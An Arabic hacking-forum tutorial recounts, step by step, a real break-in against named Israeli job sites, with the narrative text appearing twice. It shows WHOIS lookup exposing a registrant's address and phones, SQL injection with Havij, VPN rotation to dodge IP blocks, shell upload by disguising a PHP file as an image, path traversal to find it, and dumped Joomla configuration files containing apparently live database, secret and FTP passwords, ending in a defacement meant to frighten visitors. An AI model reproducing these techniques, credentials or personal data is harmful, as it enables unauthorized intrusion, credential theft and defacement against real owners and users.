للعناكب :استهذاف السيرفرات الخاصة و تخطي الحماية و الدعس و التطبيق على smarteq.co.il
موضوعي التاني بعد الغياب الطويل
خلينا نبلش ونقول
السلام عليكم وكيف الأحوال
بالموضوع السابق ذكرت سبب الغياب
وخلينا بالموضوع
الموضوع مهم ركز معي
ومن العنوان واضح شو الموضوع
يله نبلش عبركت الله
اولا نبدا بالدخول الى موقع who.is مثلا لجمع المعلومات
نسحب الايبي و نروح على Bing
الموقع سكربت خاص ..... نجرب نتفحص الموقع و نبحث عن متفيرات لعل نحقنها او نبحث عن ثغرات النكلود مثلا
نضعهم في الهافينج
ملاحضة = معظم السكربتات الخاصة مصابة
يا سلام تم الحقن و استخرجنا معلومات الادمينز .
تعالو نبحث عن لوحة التحكم ...
نبحث عن اللوحة نلاقي مكانين
الاول
نجرب ندخل بيه الى احد الباسوردات ... يرفض الدخول
نشوف الثانية
اووبس
ماني فهمان ولا اي شي ........ هي لوحة تحكم جوملا لما يكون الموقع مسكر مثلا .
نجرب
نجرب ندخل بالبيانات المسحوبة من قبل .... لم ننجح البيانات خاطئة
طيب فين لوحة التحكم ؟ ما فيه ؟ يعني شغلنا كله طار
ااااه كم هي صعبم المواقع الخاصة .....
استنى بقى ... في الموقع فيه مكان للتسجل .... ليه ما نسجل و ندخل
لان التسجيل ياخذك لمنطقة خاصة نوعاا ما ... ممكن فيها ثغرة ... او لوحة
بعد التسجيل احنا في اللوحة الخاصة بالمسجلين ..... بس استنى هو شو في ؟
الدنيا ملخبطة ؟ ؟؟ ...... انا على موقع ثاني مو الموقع الاول ؟ ؟؟
انا على ال job و شو جاب teq §§§
اقولكم ..... لما تكون مواقع خاصة ... فانه احتمال كبير ان يستخدمون نفس القاعدة البيانات ... لهذا لما حقنا السكربت الاول smartjob سحبنا معلومات من قاعدة السربت الثاني
smartteq ...لانه ببساطة نفس قاعدة البيانات
و هنا حلينا مشكلة بعض الشباب انه يحقن موقع و مايلقى اللوحة << برايفت و ماتغلى عليكم .
طيب الان بديهي انه اللوحة راح تكون في موقع smarteq.co.il
نفحص الموقع ببرنامج acuntix
و نطلع اللوحة ..... بس استنى
الموقع لما يبدا الفحص يعطيك بلوك للايبي ..... طيب كيف نفحص ؟
نفحص بالبرنامج نفسه بس مع بعض الشروط
الاول يكون عندنا vpn و نفحص الا به عشان لما يعمل بلوك نعيد نتصل و بالتالي ايبي جديد
الثاني هو و نطلع اللوحة ..... بس استنى
الموقع لما يبدا الفحص يعطيك بلوك للايبي ..... طيب كيف نفحص ؟
نفحص بالبرنامج نفسه بس مع بعض الشروط
الاول يكون عندنا vpn و نفحص الا به عشان لما يعمل بلوك نعيد نتصل و بالتالي ايبي جديد
الثاني هو
شايفين في الصورة في اليمين اعلى .... نجد pause و resume ... ههه يعني
كلما يعطينا بلوك نروح للبرنامج و نعمل pause و نروح لل Vpn و نغير اليبي ثم نعود للبرنامج و نعمل resume
و نكمل الفحص حتى نجد اللوحة هذه
نجرب ندخل بالبيانات اللي سحبناها فوق بال الهافينج ..... و النتيجة مبرررررررررروك اللوحة
بس فيه مشكلة شباب ... هو اللغة هي حدي فهمها ؟
هههه حاليا ما لازم نفهمها .. طريقة بسيطة نفس اللي في الصورة
نممر سهم الفارة و نقرا المسار او اللينك .... و نفهم معناه
و نجرب هنا
ياسلام ... نجرب نرفع شل مشفر ...... مشان ما يمسكوه الانتي فيروس
application/octet-streamno good
بفففففف ... ماينفعش نرفع ملف php
استنى بقى .... نجرب tamper data
نحول صيغة الشل على جهازي من a.php الى a.jpg
ثم
يا سلام تم الرفع
بس مسار الشل وين ؟؟؟
نجرب نشوف سورس الصفحة
جمييييييييييييييييييل جدااا ... هذا مسار الشل
ندخل من المنتصفح بففففففففففففففف ... الشل ما شتغل
شو نعمل يا جماعه ؟؟؟
استنى لحظه هو ملف thumbnail.php هو اللي في الرابط ... و يحاول يفتح لنا الشل على انه صورة .... لذلك هدا الخطا
طيب الملفات اترفعت وين ؟
لاحض الرابط فوق و الموقع .... احتمال ثغرة انكلود
نجرب هيك
ضهر خطا
جميييل
يعني من مجلد classes نرجع مجلدين ... و نصبح في lib و منه نجد مجلدي uploads و images يعني الشل يكون هنا ..
نجرب .... ياااااااااااااااااااااااااااااسلام ... هذا الشل
*****************************
الان رفعنا الشل ... طيب شو نعمل ؟ ممكن نثبت انفسنا على السيرفر جيداا
او نبحث عن ملفات حساسة
اول الملفات هي ملفات الكونفيغات
و انا اريد قراءة كونفيغ جوملا اللي لقيناه من قيبل
نجرب نبحث من الشل .... انا صراحة ضعيف جدا في سرفرات الوندوز
بس فيه طريقتي الفاشلة هذه
لا حظو المسارهنا
يعني من المفروض مسار الكونفيغ يكون
و هذا الكونفيغ
طبعاا شباب دام انها تقريبا قاعدة واحدة ..... يعني اي معلومة راح تكون حساسة جدااااااااااا
و منها
هذا كونيغ ثاني لقيته
فيه التالي
نجرب ندخل ftp
و النتيجة full access على جميع مواقعه
طيب الان الاندكس ..... كلام و صور .... و بعد شوي صاحب الموقع يعدله و خلص
جميلة صح ؟
لا
نهاجم الموقع + نهاجم الزوار ...... نرعبهم ههههههههههه
فيه فلاش بنت كانها شبح وتبلش بالصراخ ..... صراحة انا اعلق في الاندكس و لا اشغله من الرعب ههههههههه
عشان تصبح remote kill index ههههههههههههههههههههههه
نشالله كون توفقت بالشرح
وشكرا لا تنسونا من الدعاء
وفك اسر المعتقلين في سوريا
وتحسين الحال
امين يا الله
خلينا نبلش ونقول
السلام عليكم وكيف الأحوال
بالموضوع السابق ذكرت سبب الغياب
وخلينا بالموضوع
الموضوع مهم ركز معي
ومن العنوان واضح شو الموضوع
يله نبلش عبركت الله
اولا نبدا بالدخول الى موقع who.is مثلا لجمع المعلومات
PHP:
query: smartjob.co.il
reg-****: smartjob
domain: smartjob.co.il
descr: Shachar Bialick
descr: Haetzel St.12
descr: Ariel
descr: 44837
descr: Israel
phone: +972 3 5103051
fax-no: +972 3 7250210
e-mail: Shachar AT Techlocks.com
admin-c: LD-SB11242-IL
tech-c: LD-SB11242-IL
zone-c: LD-SB11242-IL
nserver: ns1.virtualbox.co.il
nserver: ns2.virtualbox.co.il
validity: 20-07-2014
status: Transfer Locked
changed: domain-registrar AT isoc.org.il 20100720 (Assigned)
changed: domain-registrar AT isoc.org.il 20101003 (Changed)
changed: domain-registrar AT isoc.org.il 20110726 (Changed)
changed: domain-registrar AT isoc.org.il 20110726 (Changed)
person: Shachar Bialick
address: Haetzel St.12
address: Ariel
address: 44837
address: Israel
phone: +972 52 8000004
fax-no: +972 3 7624553
e-mail: shachar AT internrate.co.il
nic-hdl: LD-SB11242-IL
changed: Managing Registrar 20070509
changed: Managing Registrar 20101003
registrar ****: LiveDns Ltd
registrar info: http://domains.livedns.co.il
% Rights to the data above are restricted by copyrighنسحب الايبي و نروح على Bing
الموقع سكربت خاص ..... نجرب نتفحص الموقع و نبحث عن متفيرات لعل نحقنها او نبحث عن ثغرات النكلود مثلا
PHP:
http://www.smartjob.co.il/content.php?id=2
www.smartjob.co.il/search.php?pos_type_side_search=3نضعهم في الهافينج
ملاحضة = معظم السكربتات الخاصة مصابة
PHP:
License is valid
Analyzing http://www.smartjob.co.il/search.php?pos_type_side_search=3
Host IP: 62.219.17.248
*** Server: Microsoft-IIS/7.5
Powered-by: PHP/5.2.17
Powered-by: ASP.NETيا سلام تم الحقن و استخرجنا معلومات الادمينز .
تعالو نبحث عن لوحة التحكم ...
نبحث عن اللوحة نلاقي مكانين
الاول
PHP:
https://www.smartjob.co.il/login.phpنجرب ندخل بيه الى احد الباسوردات ... يرفض الدخول
نشوف الثانية
PHP:
http://www.smartjob.co.il/admin/اووبس
ماني فهمان ولا اي شي ........ هي لوحة تحكم جوملا لما يكون الموقع مسكر مثلا .
نجرب
PHP:
http://www.smartjob.co.il/admin/administratorنجرب ندخل بالبيانات المسحوبة من قبل .... لم ننجح البيانات خاطئة
طيب فين لوحة التحكم ؟ ما فيه ؟ يعني شغلنا كله طار
ااااه كم هي صعبم المواقع الخاصة .....
استنى بقى ... في الموقع فيه مكان للتسجل .... ليه ما نسجل و ندخل
لان التسجيل ياخذك لمنطقة خاصة نوعاا ما ... ممكن فيها ثغرة ... او لوحة
بعد التسجيل احنا في اللوحة الخاصة بالمسجلين ..... بس استنى هو شو في ؟
الدنيا ملخبطة ؟ ؟؟ ...... انا على موقع ثاني مو الموقع الاول ؟ ؟؟
PHP:
https://www.smarteq.co.il/he-il/applicants/7647966b59/statusانا على ال job و شو جاب teq §§§
اقولكم ..... لما تكون مواقع خاصة ... فانه احتمال كبير ان يستخدمون نفس القاعدة البيانات ... لهذا لما حقنا السكربت الاول smartjob سحبنا معلومات من قاعدة السربت الثاني
smartteq ...لانه ببساطة نفس قاعدة البيانات
و هنا حلينا مشكلة بعض الشباب انه يحقن موقع و مايلقى اللوحة << برايفت و ماتغلى عليكم .
طيب الان بديهي انه اللوحة راح تكون في موقع smarteq.co.il
نفحص الموقع ببرنامج acuntix
و نطلع اللوحة ..... بس استنى
الموقع لما يبدا الفحص يعطيك بلوك للايبي ..... طيب كيف نفحص ؟
نفحص بالبرنامج نفسه بس مع بعض الشروط
الاول يكون عندنا vpn و نفحص الا به عشان لما يعمل بلوك نعيد نتصل و بالتالي ايبي جديد
الثاني هو و نطلع اللوحة ..... بس استنى
الموقع لما يبدا الفحص يعطيك بلوك للايبي ..... طيب كيف نفحص ؟
نفحص بالبرنامج نفسه بس مع بعض الشروط
الاول يكون عندنا vpn و نفحص الا به عشان لما يعمل بلوك نعيد نتصل و بالتالي ايبي جديد
الثاني هو
شايفين في الصورة في اليمين اعلى .... نجد pause و resume ... ههه يعني
كلما يعطينا بلوك نروح للبرنامج و نعمل pause و نروح لل Vpn و نغير اليبي ثم نعود للبرنامج و نعمل resume
و نكمل الفحص حتى نجد اللوحة هذه
PHP:
https://www.smarteq.co.il/he-il/site/adminlogin?login=trueنجرب ندخل بالبيانات اللي سحبناها فوق بال الهافينج ..... و النتيجة مبرررررررررروك اللوحة
بس فيه مشكلة شباب ... هو اللغة هي حدي فهمها ؟
هههه حاليا ما لازم نفهمها .. طريقة بسيطة نفس اللي في الصورة
نممر سهم الفارة و نقرا المسار او اللينك .... و نفهم معناه
و نجرب هنا
PHP:
https://www.smarteq.co.il/he-il/admin/settings/accountياسلام ... نجرب نرفع شل مشفر ...... مشان ما يمسكوه الانتي فيروس
application/octet-streamno good
بفففففف ... ماينفعش نرفع ملف php
استنى بقى .... نجرب tamper data
نحول صيغة الشل على جهازي من a.php الى a.jpg
ثم
يا سلام تم الرفع
بس مسار الشل وين ؟؟؟
نجرب نشوف سورس الصفحة
جمييييييييييييييييييل جدااا ... هذا مسار الشل
PHP:
https://www.smarteq.co.il/lib/incs/classes/thumbnail.php?image=6002_a.php&p=26&core=trueندخل من المنتصفح بففففففففففففففف ... الشل ما شتغل
شو نعمل يا جماعه ؟؟؟
استنى لحظه هو ملف thumbnail.php هو اللي في الرابط ... و يحاول يفتح لنا الشل على انه صورة .... لذلك هدا الخطا
طيب الملفات اترفعت وين ؟
لاحض الرابط فوق و الموقع .... احتمال ثغرة انكلود
نجرب هيك
PHP:
https://www.smarteq.co.il/lib/incs/classes/thumbnail.php?image=../../ضهر خطا
جميييل
PHP:
../../_uploads/images/../يعني من مجلد classes نرجع مجلدين ... و نصبح في lib و منه نجد مجلدي uploads و images يعني الشل يكون هنا ..
PHP:
https://www.smarteq.co.il/lib/_uploads/images/6002_a.phpنجرب .... ياااااااااااااااااااااااااااااسلام ... هذا الشل
*****************************
الان رفعنا الشل ... طيب شو نعمل ؟ ممكن نثبت انفسنا على السيرفر جيداا
او نبحث عن ملفات حساسة
اول الملفات هي ملفات الكونفيغات
و انا اريد قراءة كونفيغ جوملا اللي لقيناه من قيبل
نجرب نبحث من الشل .... انا صراحة ضعيف جدا في سرفرات الوندوز
بس فيه طريقتي الفاشلة هذه
لا حظو المسارهنا
PHP:
c:DomainsShaharBsmarteq.co.ilwwwrootlib_uploads
PHP:
c:DomainsShaharBsmartjob.co.ilwwwrootadminconfiguration.php
PHP:
<?php
class JConfig {
public $offline = '1';
public $offline_message =
public $site**** = 'SmartJOB';
public $editor = 'tinymce';
public $list_limit = '20';
public $access = '1';
public $debug = '0';
public $debug_lang = '0';
public $dbtype = 'mysql';
public $host = 'localhost';
public $user = 'getsmar_cv123';
public $password = 'H5p60v9OfT9n';
public $db = 'getsmar_smartjob';
public $dbprefix = 'jos_';
public $live_site = '';
public $secret = '1phLFwWlgWcTugFj';
public $gzip = '0';
public $error_reporting = '-1';
public $helpurl = 'http://help.joomla.org/proxy/index.php?option=com_help&keyref=Help{major}{minor}:{keyref}';
public $ftp_host = '127.0.0.1';
public $ftp_port = '21';
public $ftp_user = '';
public $ftp_pass = '';
public $ftp_root = '';
public $ftp_enable = '0';
public $offset = 'UTC';
public $offset_user = 'UTC';
public $mailer = 'mail';
public $mailfrom = 'admin@smartjob.co.il';
public $from**** = 'SmartJOB';
public $sendmail = '/usr/sbin/sendmail';
public $smtpauth = '0';
public $smtpuser = '×،×™×،××گ';
public $smtppass = '****l100';
public $smtphost = 'localhost';
public $smtpsecure = 'none';
public $smtpport = '25';
public $caching = '0';
public $cache_handler = 'file';
public $cachetime = '15';
public $****Desc = '';
public $****Keys = '';
public $****Title = '1';
public $****Author = '1';
public $sef = '1';
public $sef_rewrite = '0';
public $sef_suffix = '0';
public $unicodeslugs = '0';
public $feed_limit = '10';
public $log_path = 'C:\\Domains\\ShaharB\\smartjob.co.il\\wwwroot\\admin\\logs';
public $tmp_path = 'C:\\Domains\\ShaharB\\smartjob.co.il\\wwwroot\\admin\\tmp';
public $lifetime = '15';
public $session_handler = 'database';
public $****Rights = '';
public $site****_pagetitles = '0';
public $force_ssl = '0';
public $feed_email = 'author';
public $******_domain = '';
public $******_path = '';
}طبعاا شباب دام انها تقريبا قاعدة واحدة ..... يعني اي معلومة راح تكون حساسة جدااااااااااا
و منها
هذا كونيغ ثاني لقيته
PHP:
C:DomainsShaharBsmartjob.co.ilwwwrootconfiguration.phpفيه التالي
PHP:
public $ftp_host = '62.219.17.236';
public $ftp_port = '21';
public $ftp_user = 'OrZilca';
public $ftp_pass = 'WorkHard50';
public $ftp_root = 'smartjob.co.il/wwwroot/';
public $ftp_enable = '1';نجرب ندخل ftp
و النتيجة full access على جميع مواقعه
طيب الان الاندكس ..... كلام و صور .... و بعد شوي صاحب الموقع يعدله و خلص
جميلة صح ؟
لا
نهاجم الموقع + نهاجم الزوار ...... نرعبهم ههههههههههه
فيه فلاش بنت كانها شبح وتبلش بالصراخ ..... صراحة انا اعلق في الاندكس و لا اشغله من الرعب ههههههههه
عشان تصبح remote kill index ههههههههههههههههههههههه
نشالله كون توفقت بالشرح
وشكرا لا تنسونا من الدعاء
وفك اسر المعتقلين في سوريا
وتحسين الحال
امين يا الله